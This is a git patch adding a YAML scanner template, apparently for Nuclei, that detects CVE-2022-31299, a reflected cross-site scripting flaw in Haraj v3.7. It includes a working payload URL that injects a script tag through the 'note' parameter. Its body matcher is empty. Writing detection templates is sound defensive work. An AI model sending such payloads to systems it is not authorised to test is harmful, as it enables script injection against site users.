From 72c30600866923a370769971d09138a56635b172 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Thu, 15 Sep 2022 13:58:57 +0200 Subject: [PATCH] Add CVE-2022-31299 --- cves/2022/CVE-2022-31299.yaml | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2022/CVE-2022-31299.yaml diff --git a/cves/2022/CVE-2022-31299.yaml b/cves/2022/CVE-2022-31299.yaml new file mode 100644 index 0000000000..047cfa396d --- /dev/null +++ b/cves/2022/CVE-2022-31299.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-31299 + +info: + name: Haraj v3.7 - Reflected XSS + author: edoardottt + severity: medium + description: Haraj v3.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the User Upgrade Form. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-31299 + - https://github.com/bigzooooz/CVE-2022-31299 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-31299 + cwe-id: CWE-79 + tags: cve,cve2022,haraj,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/harajnext/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1¬e=%3C/textarea%3E%3Cscript%3Ealert(String.fromCharCode(98,52,122,98,48,122))%3C/script%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "" \ No newline at end of file